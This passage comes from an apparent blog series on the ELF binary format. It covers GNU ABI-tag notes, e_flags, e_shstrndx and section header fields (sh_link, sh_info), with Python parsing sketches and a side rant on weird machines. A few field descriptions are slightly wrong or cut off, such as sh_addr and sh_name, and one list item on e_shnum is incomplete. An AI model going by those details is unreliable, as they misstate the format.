<li>namesz is set to<span style="font-family: "courier new" , "courier" , monospace;"> 0x04 00 00 00</span> which means the name field is 4 bytes in size</li>
<li>descsz is set to<span style="font-family: "courier new" , "courier" , monospace;"> 0x10 00 00 00</span> which means the description field is 16 bytes in size</li>
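<li>type is set to <span style="font-family: "courier new" , "courier" , monospace;">0x01 00 00 00</span>, which for a note named "GNU" means <span style="font-family: "courier new" , "courier" , monospace;">NT_GNU_ABI_TAG</span>: this is an ABI tag, and the OS itself (GNU/Linux, <i>because my machines are FREE machines!</i>) is recorded in the first word of desc</li>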
<li>name field reads <span style="font-family: "courier new" , "courier" , monospace;">0x47 0x4e 0x55 0x00</span> which we can clearly see reads<span style="font-family: "courier new" , "courier" , monospace;"> 'G' 'N' 'U'</span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">desc</span> field holds an array of values starting at <span style="font-family: "courier new" , "courier" , monospace;">0x268 -> 0x27C</span>. </li>
</ul>
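The 16 desc bytes of an ABI tag are four 32-bit words: an OS code followed by a major, minor and subminor version. A hedged Python sketch of decoding them, assuming little-endian words and using the OS codes from the <span style="font-family: "courier new" , "courier" , monospace;">ELF_NOTE_OS_*</span> constants in glibc's <span style="font-family: "courier new" , "courier" , monospace;">elf.h</span>; the helper name is hypothetical:<br />

```python
import struct

# OS codes for the first desc word of an NT_GNU_ABI_TAG note
# (the ELF_NOTE_OS_* values from glibc's <elf.h>).
ABI_TAG_OS = {0: "Linux", 1: "GNU", 2: "Solaris2", 3: "FreeBSD"}


def decode_abi_tag(desc: bytes) -> str:
    """Turn the 16-byte desc of a .note.ABI-tag note into e.g. 'Linux 3.2.0'."""
    os_code, major, minor, subminor = struct.unpack("<IIII", desc)
    os_name = ABI_TAG_OS.get(os_code, f"unknown({os_code})")
    return f"{os_name} {major}.{minor}.{subminor}"
```

The version triple is the oldest kernel the binary claims to support, which is why it's interesting both for forensics and for forging.<br />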
<div>
The <span style="font-family: "courier new" , "courier" , monospace;">desc</span> field needs a little explaining, and the documentation on it is slim, but there are a couple of places that may explain it better than I do (<i>I've included them in the references and reading section</i>). To see how it's handled, check out this extract from <span style="font-family: "courier new" , "courier" , monospace;">glibc-2.28/elf/dl-load.c</span>:</div>
<div>
<script src="https://gist.github.com/k3170makan/6fc9bec56bec621cf27b5ff979e4dddf.js"></script>
</div>
<div>
<br /></div>
<br />
<br />
Essentially it indicates the OS version, and when <span style="font-family: "courier new" , "courier" , monospace;">dl-load</span> handles it, that version is clearly compared against a reference value in the library. How exactly this OS version field works is going to take a little more research on my part before I get much more mouthy about it.<br />
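For a feel of the comparison, here's a Python re-expression of the arithmetic as I read the glibc extract above: major, minor and subminor are each masked to 8 bits and packed into one integer, which is then compared against the running kernel's version. This is my paraphrase rather than a copy of glibc, and both function names are hypothetical.<br />

```python
def pack_osversion(major: int, minor: int, subminor: int) -> int:
    """Pack a version triple as major * 65536 + minor * 256 + subminor,
    masking each component to 8 bits (my reading of the dl-load.c check)."""
    return (major & 0xFF) * 65536 + (minor & 0xFF) * 256 + (subminor & 0xFF)


def kernel_too_old(running: tuple, required: tuple) -> bool:
    """True when the running kernel's packed version is below the note's.

    Sketch only: ignores the case where the loader has no kernel
    version available to compare against.
    """
    return pack_osversion(*running) < pack_osversion(*required)
```

So a note demanding 3.2.0 packs to 0x030200, and a loader running on a 2.6.x kernel would refuse the object.<br />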
<br />
<h2 style="text-align: left;">
Conclusion</h2>
<br />
That's going to be it for this post. I don't like to bloat posts with too much text because, as we know, things are easier to understand when they are broken into smaller parts and carefully studied*(<i>see the side rant for more hehe</i>). In further posts in the series I will expand on the rest of the sections. For now, I hope that by cracking open these few I've started you on your way to detailing how the others work too; understanding their types, and therefore their layout, gives us the power to control how they are interpreted. There are a lot more tricks that can be pulled off by messing with these fields. So happy hacking!<br />
<br />
And stay tuned for the follow up posts on the GNU_HASH and other weird archaic section types.<br />
<br />
<h2 style="text-align: left;">
References and Recommended Reading:</h2>
<br />
<br />
<ol style="text-align: left;">
<li><a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format%C2%A0">https://en.wikipedia.org/wiki/Executable_and_Linkable_Format </a></li>
<li><a href="https://refspecs.linuxfoundation.org/LSB_2.1.0/LSB-Embedded/LSB-Embedded/elftypes.html%C2%A0">https://refspecs.linuxfoundation.org/LSB_2.1.0/LSB-Embedded/LSB-Embedded/elftypes.html </a></li>
<li><a href="https://blogs.oracle.com/solaris/inside-elf-symbol-tables-v2">https://blogs.oracle.com/solaris/inside-elf-symbol-tables-v2 </a></li>
<li><a href="https://docs.oracle.com/cd/E19120-01/open.solaris/819-0690/chapter6-79797/index.html%C2%A0">https://docs.oracle.com/cd/E19120-01/open.solaris/819-0690/chapter6-79797/index.html </a></li>
<li><a href="https://sourceware.org/ml/binutils/2006-10/msg00377.html%C2%A0">https://sourceware.org/ml/binutils/2006-10/msg00377.html</a></li>
<li><a href="https://r00tk1ts.github.io/2017/08/24/GNU%20Hash%20ELF%20Sections/">https://r00tk1ts.github.io/2017/08/24/GNU%20Hash%20ELF%20Sections/</a> </li>
<li><a href="https://en.wikipedia.org/wiki/Weird_machine">https://en.wikipedia.org/wiki/Weird_machine </a></li>
<li><a href="https://www.cs.dartmouth.edu/~sergey/wm/">https://www.cs.dartmouth.edu/~sergey/wm/ </a></li>
<li><a href="https://en.wikipedia.org/wiki/Category_theory">https://en.wikipedia.org/wiki/Category_theory </a></li>
<li><a href="http://langsec.org/papers/Bratus.pdf">http://langsec.org/papers/Bratus.pdf </a></li>
</ol>
<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>*<side-rant></b></span><br />
Why is this? Why do we need to break things to learn them, especially computers? In many sciences we learn how things are built by breaking them down, tearing them apart, boiling away their non-essential parts and deciding what they mean from the perspective of their super-structures; we study how the "super" works by breaking open its "minor" parts, i.e. <i>we learn how large complex curves behave in calculus by breaking them down into small straight lines; we learn what particles are made of by smashing them into one another so we can see the smaller parts; we learn how philosophy texts work by deconstructing them in some contexts and reconstructing them in others. It seems to be a common theme in fields held to traditions of rigorous logical thinking</i>.<br />
<br />
More directly perhaps in the science of computer hacking, because we often work in the realms governed by <i>(or are inevitably always governed by</i>) the capability of computer languages (<i>which themselves are governed by the relations between sets, their labels and sizes</i>); some have realized that our greatest pains and harshest challenges come often straight from underestimating the way languages work when they are allowed to be spoken with their broken, inconsistent and superstructure referencing parts (<i>every language is an expression of a "base" or "host" language that usually has different and more powerful capabilities than its "guest" - in computer science we discern the power of these languages by their computational capabilities</i>).<br />
<br />
Just to cleanly connect my points here: one language is "bigger" than, or "hosts", another by the size of its <i>computational</i> power and by the references possible from its "hosted" (subset, computationally smaller) languages, i.e. what it can possibly compute, under certain proofs, when those smaller languages are used in these contexts. Sometimes a host lends "subsets" of this power to isolated subsets of its literal symbols:<i> for instance, imagine a "language" "within" JavaScript for setting variable values and another "within" JavaScript for controlling execution flow. Could setting a variable be allowed to become an if statement, or equivalently a control of execution flow? Of course! It's JavaScript! Just stick the variable value in an eval call ;) </i><br />
<br />
So through the languages we can directly speak (<i>strings and other input data</i>), we make reference to outer, more powerful structures that appear within the languages themselves (<i>or, more generally, are "equivalently" in the languages themselves; I leave space for <a href="https://en.wikipedia.org/wiki/Category_theory">category theory</a> and input fuzzing to argue what the "Set" is and therefore what is "in" it as well</i>), structures that also impose or allow power over their ordering, labeling and effective interpretation. We say that these spirits called "<a href="https://en.wikipedia.org/wiki/Weird_machine">weird machines</a>" arise from learning what we can summon in apparent "non-weird machines" by giving execution and interpretation to the aspects of a language that are built in the "intersections" between other languages. A quick example relevant here: if you can make string input to a program also impose meaning (<i>ordering or labeling properties</i>) on the stack layout (regardless of <i>how</i>), so that the string is both character data and stack address data, it exposes an intersection of two languages which gives life to the string data in an unusual but powerful way: it is not just displayable but also executable!<br />
<br />
Anyway sorry for the philosophical rant - on with the section meta-data mangling! <b><span style="font-family: "courier new" , "courier" , monospace;"></side-rant></span></b><br />
<br />
<br />
<br /></div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-41600725793192952312018-09-25T23:42:00.001-07:002018-09-26T17:39:37.564-07:00Introduction to the ELF File Format (Part III) : The Section Headers<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Hi folks! This post is part of a series I'm covering on the ELF format. In this one I'm going to discuss the section headers and unpack how they work.<br />
<br />
So far we have:<br />
<ol style="text-align: left;">
<li><a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">Introduction to the ELF File Format : The ELF Header (Part I)</a> </li>
<li><a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">Introduction to the ELF File Format Part II : Program Headers </a> (<i>I know the naming is confusing, totally didn't play this out that well but I'll keep it consistent from here on out ;</i>)</li>
<li>This</li>
</ol>
<div>
I know, it's a super long list, right? But it's going to get a bunch more entries very soon. In this one I'm going to cover the rest of the ELF header fields I skipped in the first post, unpack how section headers work, and drop a nice illustration of the format as well. Enjoy!</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0t2DD6JmiZbsl2z0MEqs10pMpMaIFbbJmZdoLMKGNB8YQbRazqoctRJhLoOWWxXN7EIAOW3Wh-sPYUOd8tUDZFzQyGOPnpkRglgIeSMXojBB4XNGGHfrmC_HrHoe2Z_DX4s9Zne7yXrI/s1600/ELF+Format+Sketch+%25284%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="912" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0t2DD6JmiZbsl2z0MEqs10pMpMaIFbbJmZdoLMKGNB8YQbRazqoctRJhLoOWWxXN7EIAOW3Wh-sPYUOd8tUDZFzQyGOPnpkRglgIeSMXojBB4XNGGHfrmC_HrHoe2Z_DX4s9Zne7yXrI/s1600/ELF+Format+Sketch+%25284%2529.png" /></a></div>
</div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">e_flags </span>field and the rest</h2>
<div>
This header field can contain a number of architecture-specific values and sometimes indicates things about the ABI as well. Each architecture defines its own weird set of values, and they basically mark the ELF with certain attributes, mostly whether it makes use of extensions or special code formats. Here's the example for MIPS:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEEBdb7MF3cGfxLDqDNU4RrTsbXJR8Ox6bMdwNlojwrJEfGO-3WYtdWeSsid1XbYOos8IrIVCEyyFVgUolHZNuXYIB0yaw_QaKPnt2UtwKobFZzplRSsXCRSBfuY6PnBPjl6KwF-osH1A/s1600/Screenshot+from+2018-09-24+19-57-46.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="472" data-original-width="1427" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEEBdb7MF3cGfxLDqDNU4RrTsbXJR8Ox6bMdwNlojwrJEfGO-3WYtdWeSsid1XbYOos8IrIVCEyyFVgUolHZNuXYIB0yaw_QaKPnt2UtwKobFZzplRSsXCRSBfuY6PnBPjl6KwF-osH1A/s1600/Screenshot+from+2018-09-24+19-57-46.png" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;">from <a href="https://dmz-portal.mips.com/wiki/MIPS_ELF_header_definitions">https://dmz-portal.mips.com/wiki/MIPS_ELF_header_definitions </a></td></tr>
</tbody></table>
<br />
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
As you can see, pretty boring stuff. There are also special values for <a href="http://infocenter.arm.com/help/topic/com.arm.doc.ihi0044f/IHI0044F_aaelf.pdf">ARM</a> and <a href="https://docs.oracle.com/cd/E19120-01/open.solaris/819-0690/chapter6-43405/index.html">SPARC</a>, and there should be for all the other architectures ELFs can run on (they just aren't as easy to find examples for as those two lol).<br />
<br /></div>
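If you'd like to pull <span style="font-family: "courier new" , "courier" , monospace;">e_flags</span> and the other header fields out of a file yourself, here's a minimal Python sketch for a little-endian ELF64 header. The field order follows the standard <span style="font-family: "courier new" , "courier" , monospace;">Elf64_Ehdr</span> layout; <span style="font-family: "courier new" , "courier" , monospace;">parse_elf64_header</span> is a hypothetical helper name.<br />

```python
import struct

# Elf64_Ehdr fields that follow the 16-byte e_ident, little-endian, no padding.
EHDR_FMT = "<HHIQQQIHHHHHH"
EHDR_FIELDS = ("e_type", "e_machine", "e_version", "e_entry", "e_phoff",
               "e_shoff", "e_flags", "e_ehsize", "e_phentsize", "e_phnum",
               "e_shentsize", "e_shnum", "e_shstrndx")


def parse_elf64_header(data: bytes) -> dict:
    """Decode the ELF64 header fields after e_ident (little-endian only)."""
    # e_ident[4] == 2 means ELFCLASS64, e_ident[5] == 1 means little-endian.
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    return dict(zip(EHDR_FIELDS, struct.unpack_from(EHDR_FMT, data, 16)))
```

The same dictionary also hands you <span style="font-family: "courier new" , "courier" , monospace;">e_shstrndx</span> and the section header table fields discussed next.<br />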
<h2 style="text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">e_shstrndx</span></h2>
<div>
This field holds the index of the <span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span> entry in the section header table. That section is merely a sequence of null-terminated strings naming the sections (used by readelf as well), providing some semantics for interpretation.<br />
<br />
To make sure we know exactly how it works, here's a quick diagram showing how this section works:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwobZ_AY3TxnIGe-gWpqF6sSVKsbSA6fawcrCx9LSNf0An6WICI81qTo24Z3OXMKat5JlkHYNE_F95TDxqVtKzc0enmKn9UsOrfk1_eglPX-dONTRAUmNIWYl8YgNTrl2SM5ZcIqDVaR0/s1600/shstrndx+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwobZ_AY3TxnIGe-gWpqF6sSVKsbSA6fawcrCx9LSNf0An6WICI81qTo24Z3OXMKat5JlkHYNE_F95TDxqVtKzc0enmKn9UsOrfk1_eglPX-dONTRAUmNIWYl8YgNTrl2SM5ZcIqDVaR0/s1600/shstrndx+%25281%2529.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<div>
<br /></div>
<div>
As you can see in the header value dump from <span style="font-family: "courier new" , "courier" , monospace;">readelf</span>, the index number is listed as 28. The next image shows a dump of the section header table, also from <span style="font-family: "courier new" , "courier" , monospace;">readelf -S</span>; we're focused on entry 28, which is called <span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span>. The last frame shows an honest <span style="font-family: "courier new" , "courier" , monospace;">hexdump</span> of the file confirming these theories: offset <span style="font-family: "courier new" , "courier" , monospace;">0x18f4</span> contains the start of the ASCII data that programs like <span style="font-family: "courier new" , "courier" , monospace;">ld</span> and <span style="font-family: "courier new" , "courier" , monospace;">readelf</span> dereference as the names of the sections.<br />
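Resolving a name from that string data boils down to "start at an offset, read until the next null byte". A tiny Python sketch (the helper name is hypothetical, and the sample table below is a made-up illustration of the usual layout, not bytes copied from my binary):<br />

```python
def name_from_strtab(strtab: bytes, offset: int) -> str:
    """Return the null-terminated string starting at `offset` in a string
    table such as .shstrtab; raises ValueError if no terminator follows."""
    end = strtab.index(b"\x00", offset)
    return strtab[offset:end].decode("ascii")


# Illustrative .shstrtab contents: entries are packed back to back.
SAMPLE_SHSTRTAB = b"\x00.symtab\x00.strtab\x00.shstrtab\x00.interp\x00"
```

In this sample, offset 0 gives the empty name that the null section uses, and <span style="font-family: "courier new" , "courier" , monospace;">.interp</span> lands at offset <span style="font-family: "courier new" , "courier" , monospace;">0x1b</span>.<br />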
<br />
Okay, that's the ELF header finally done and dusted. Let's check out how section headers work. </div>
<h2 style="text-align: left;">
Section Headers</h2>
<div style="text-align: left;">
Finally, time to explain the section headers. They serve almost purely to tag areas of the file with semantic information so that other programs (linkers, debuggers and the like) can find symbols, debug information, meta-data about the sections themselves and much, much more. Here are the ELF header fields that hold information about the section header table:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">e_shoff</span> - file offset where the section headers start</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">e_shnum</span> - number of entries in the </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">e_shentsize</span> - the size of entries in the section header table</li>
</ul>
<div>
These are pretty straightforward: they just let ELF interpreters aim at the start of the table and logically limit how many entries to read and how big each one is. Each section header table entry itself has a couple of properties. Sections have types, related sections that hold meta-data, and names! Here's what the ELF standard defines as section attributes:</div>
<div>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_name</span> - the index of <span style="font-family: "courier new" , "courier" , monospace;">.strtab</span> that contains the section name</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_type</span> - the section type (<span style="font-family: "courier new" , "courier" , monospace;">SHT_NULL, SHT_DYN</span>,...)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_flags</span> - the memory attributes of this section during execution (<span style="font-family: "courier new" , "courier" , monospace;">SHF_WRITE, SHF_ALLOC</span>,...)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_addr</span> - the address in the file where this section starts</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_size</span> - the size in bytes this section occupies</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_link</span> - associates a section to this one, field value can depend on <span style="font-family: "courier new" , "courier" , monospace;">sh_type</span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_addralign</span> - memory alignment value for this section</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">sh_entsize</span> - the size of the entry in bytes.</li>
</ul>
</div>
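Here's a minimal Python sketch that walks the section header table using those header values and unpacks each entry. It assumes a little-endian ELF64 file, where each <span style="font-family: "courier new" , "courier" , monospace;">Elf64_Shdr</span> is 64 bytes; <span style="font-family: "courier new" , "courier" , monospace;">read_section_headers</span> is a hypothetical helper name.<br />

```python
import struct

# Elf64_Shdr: sh_name, sh_type (4 bytes each); sh_flags, sh_addr, sh_offset,
# sh_size (8 bytes each); sh_link, sh_info (4 bytes each); sh_addralign,
# sh_entsize (8 bytes each). 64 bytes in total, little-endian.
SHDR_FMT = "<IIQQQQIIQQ"
SHDR_FIELDS = ("sh_name", "sh_type", "sh_flags", "sh_addr", "sh_offset",
               "sh_size", "sh_link", "sh_info", "sh_addralign", "sh_entsize")


def read_section_headers(data: bytes, shoff: int, shnum: int, shentsize: int):
    """Return one dict per section header, walking the table the way the
    e_shoff, e_shnum and e_shentsize header fields describe it."""
    headers = []
    for i in range(shnum):
        values = struct.unpack_from(SHDR_FMT, data, shoff + i * shentsize)
        headers.append(dict(zip(SHDR_FIELDS, values)))
    return headers
```

Note that <span style="font-family: "courier new" , "courier" , monospace;">sh_name</span> comes back as a raw offset; you still have to look it up in <span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span> to get a readable name.<br />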
<div>
These fields have a number of possible values, so I've sketched some of them out to give you a kind of cheat sheet overview:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX0328Z2jKOM4qg5ZY5V9hCQBzUsvBT-BkxI9NGXFehAff9JoyrSNmABVbXZXFZ1rtzAxTUm4SwW5ch9kKv0GXxz0SKpXfRW8HDLBfxDVRco0GvtJXG2uZ9cI8TOcMcTnIs6Uy9nAyHpU/s1600/Section+Headers.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="912" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX0328Z2jKOM4qg5ZY5V9hCQBzUsvBT-BkxI9NGXFehAff9JoyrSNmABVbXZXFZ1rtzAxTUm4SwW5ch9kKv0GXxz0SKpXfRW8HDLBfxDVRco0GvtJXG2uZ9cI8TOcMcTnIs6Uy9nAyHpU/s1600/Section+Headers.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br />
The <span style="font-family: "courier new" , "courier" , monospace;">sh_link</span> field associates this section with another one that provides important meta-data for its function. For instance, if a section needs a list of strings to make sense of its contents, this field will contain the index of the section that holds those strings. </div>
<div>
<br /></div>
<div>
A good analogy: if a section were, let's say, a list of pokemon cards, you might need another section that defines the pokemon card types or holds the names of the cards; in that case <span style="font-family: "courier new" , "courier" , monospace;">sh_link</span> would point to the section that contains this data. So it allows sections to support one another in function.<br />
<br />
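We can see examples of this in the functionality of sections like <span style="font-family: "courier new" , "courier" , monospace;">.rela.plt</span> or <span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span> (<i>the list of dynamic symbols and their properties</i>). <span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span> needs to know where the dynamic symbol names live, so its <span style="font-family: "courier new" , "courier" , monospace;">sh_link</span> holds the index of <span style="font-family: "courier new" , "courier" , monospace;">.dynstr</span>; likewise, the <span style="font-family: "courier new" , "courier" , monospace;">sh_link</span> of <span style="font-family: "courier new" , "courier" , monospace;">.rela.plt</span> holds the index of the symbol table its relocations refer to.<br />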
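Since what <span style="font-family: "courier new" , "courier" , monospace;">sh_link</span> means depends on the section type, a quick Python sketch of following it might look like this. The meanings come from the standard ELF section type table for a handful of common types; the tiny section table in <span style="font-family: "courier new" , "courier" , monospace;">TOY_SECTIONS</span> is made up for illustration, and <span style="font-family: "courier new" , "courier" , monospace;">describe_link</span> is a hypothetical helper.<br />

```python
# What sh_link refers to for a few common section types, keyed by sh_type.
LINK_MEANING = {
    2: "string table holding the symbol names",     # SHT_SYMTAB
    11: "string table holding the symbol names",    # SHT_DYNSYM
    4: "symbol table the relocations refer to",     # SHT_RELA
    9: "symbol table the relocations refer to",     # SHT_REL
    5: "symbol table the hash table indexes",       # SHT_HASH
    6: "string table used by the dynamic entries",  # SHT_DYNAMIC
}

# Made-up section table: (name, sh_type, sh_link) in header-table order.
TOY_SECTIONS = [("", 0, 0), (".interp", 1, 0), (".dynsym", 11, 3),
                (".dynstr", 3, 0), (".rela.plt", 4, 2)]


def describe_link(sections, index):
    """Explain where section `index` points via sh_link, if anywhere."""
    name, sh_type, sh_link = sections[index]
    meaning = LINK_MEANING.get(sh_type)
    if meaning is None:
        return f"{name}: sh_link={sh_link} (no standard meaning for this type)"
    return f"{name} -> {sections[sh_link][0]} ({meaning})"
```

For the toy table, <span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span> resolves to <span style="font-family: "courier new" , "courier" , monospace;">.dynstr</span> and <span style="font-family: "courier new" , "courier" , monospace;">.rela.plt</span> resolves to <span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span>.<br />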
<br />
Here's how it looks when <span style="font-family: "courier new" , "courier" , monospace;">readelf</span> interprets this - with some helpful annotation of course:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5vVVGvf6Drv2_9Fg7RTQiEtRn17QurZy1h59dimvNw6wc-i2x05KBYL9l0TNojHwGaErYCYHYN5wkMLGAUGEOuvRGoZWFwwTpShRwV0FFK5HS7U8w5saxU10asPx84bMZPhRJVRb5-EU/s1600/sh_link+%25284%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="817" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5vVVGvf6Drv2_9Fg7RTQiEtRn17QurZy1h59dimvNw6wc-i2x05KBYL9l0TNojHwGaErYCYHYN5wkMLGAUGEOuvRGoZWFwwTpShRwV0FFK5HS7U8w5saxU10asPx84bMZPhRJVRb5-EU/s1600/sh_link+%25284%2529.png" /></a></div>
<br /></div>
<div>
<br /></div>
<div>
I hope that makes it clear what that field is for: it just provides a pointer to another section header with some important associated information. The <span style="font-family: "courier new" , "courier" , monospace;">sh_info</span> field works in a similar way, although what it holds depends even more on the section type. Here's what the section header table looks like when it's labelled to reflect the sh_info field references:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVcO38CYXkwa3eGZqn7zp8XwdzGQ0GztA3aSO64qV-mMSHhzulxgwod5qa6y2RKK8dzrLINzwS_se20q5BeQRAM7q3rQHdqXyVMn880B5hJXkfI3CMguUou4855CN8oQzD4x1KHf5We34/s1600/sh_info.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="817" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVcO38CYXkwa3eGZqn7zp8XwdzGQ0GztA3aSO64qV-mMSHhzulxgwod5qa6y2RKK8dzrLINzwS_se20q5BeQRAM7q3rQHdqXyVMn880B5hJXkfI3CMguUou4855CN8oQzD4x1KHf5We34/s1600/sh_info.png" /></a></div>
<br /></div>
<div>
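At first glance <span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span> appears to point to the <span style="font-family: "courier new" , "courier" , monospace;">.interp</span> section, which holds the path name of the interpreter, the program in charge of making sense of the symbol table and function relocation. Careful, though: for symbol tables <span style="font-family: "courier new" , "courier" , monospace;">sh_info</span> is not a section index at all. It holds one greater than the index of the last local symbol, so a value of 1 (a common one) just means only the null symbol is local, and landing on <span style="font-family: "courier new" , "courier" , monospace;">.interp</span> (usually section 1) is a coincidence. For relocation sections such as <span style="font-family: "courier new" , "courier" , monospace;">.rela.plt</span>, on the other hand, <span style="font-family: "courier new" , "courier" , monospace;">sh_info</span> really is a section index: it names the section the relocations apply to.</div>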
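To make the type-dependence concrete, here's a hedged Python sketch that interprets <span style="font-family: "courier new" , "courier" , monospace;">sh_info</span> for symbol tables and relocation sections, following the standard ELF rules for those types. The section table in <span style="font-family: "courier new" , "courier" , monospace;">TOY_SECTIONS</span> is invented for the example, and <span style="font-family: "courier new" , "courier" , monospace;">describe_info</span> is a hypothetical helper.<br />

```python
SHT_SYMTAB, SHT_RELA, SHT_REL, SHT_DYNSYM = 2, 4, 9, 11

# Made-up section table: (name, sh_type, sh_info) in header-table order.
TOY_SECTIONS = [("", 0, 0), (".interp", 1, 0), (".dynsym", 11, 1),
                (".dynstr", 3, 0), (".rela.plt", 4, 5), (".got.plt", 1, 0)]


def describe_info(sections, index):
    """Interpret sh_info for section `index` according to its sh_type."""
    name, sh_type, sh_info = sections[index]
    if sh_type in (SHT_SYMTAB, SHT_DYNSYM):
        # Not a section index: one past the last local (STB_LOCAL) symbol,
        # which is the index of the first non-local symbol.
        return f"{name}: first non-local symbol is #{sh_info}"
    if sh_type in (SHT_REL, SHT_RELA) and sh_info != 0:
        # A real section index: the section these relocations patch.
        return f"{name}: relocations apply to {sections[sh_info][0]}"
    return f"{name}: sh_info={sh_info}"
```

The zero check is there because dynamic relocation sections such as <span style="font-family: "courier new" , "courier" , monospace;">.rela.dyn</span> commonly leave <span style="font-family: "courier new" , "courier" , monospace;">sh_info</span> at 0.<br />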
<div>
<br />
You might be interested in knowing how this looks in <span style="font-family: "courier new" , "courier" , monospace;">hexdump</span>, so here you go (<i>with nice labels too!</i>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpxR7YP3U3qgZFYikseTqdWbfy5F2c1-Yellv3JpUI0qk2fgbDFGnxrYIL9q5paz4DAtcv7ndZTxDkuZewGVcyx-5B2CZ_Yex_ZgLSjt9yywtPNWM-6l83Pb9wASZftekmhGK2iAG6Yk/s1600/Section+Header+Table.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="388" data-original-width="1016" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpxR7YP3U3qgZFYikseTqdWbfy5F2c1-Yellv3JpUI0qk2fgbDFGnxrYIL9q5paz4DAtcv7ndZTxDkuZewGVcyx-5B2CZ_Yex_ZgLSjt9yywtPNWM-6l83Pb9wASZftekmhGK2iAG6Yk/s1600/Section+Header+Table.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
As you can see, the <span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span> really is used to dereference the names of the sections. In the raw format, <span style="font-family: "courier new" , "courier" , monospace;">0x1b</span> is the offset in <span style="font-family: "courier new" , "courier" , monospace;">.shstrtab</span> where the name of <span style="font-family: "courier new" , "courier" , monospace;">.interp</span> is saved, and <span style="font-family: "courier new" , "courier" , monospace;">readelf</span> fetches it for us and prints out the nice fancy name.<br />
<br /></div>
<div>
Next up, we can move on to unpacking how symbol and library resolution works. Stay tuned!</div>
<div>
<h2 style="text-align: left;">
References and Reading</h2>
</div>
<div>
<ol style="text-align: left;">
<li><a href="https://docs.oracle.com/cd/E19120-01/open.solaris/819-0690/chapter6-43405/index.html%C2%A0">https://docs.oracle.com/cd/E19120-01/open.solaris/819-0690/chapter6-43405/index.html </a></li>
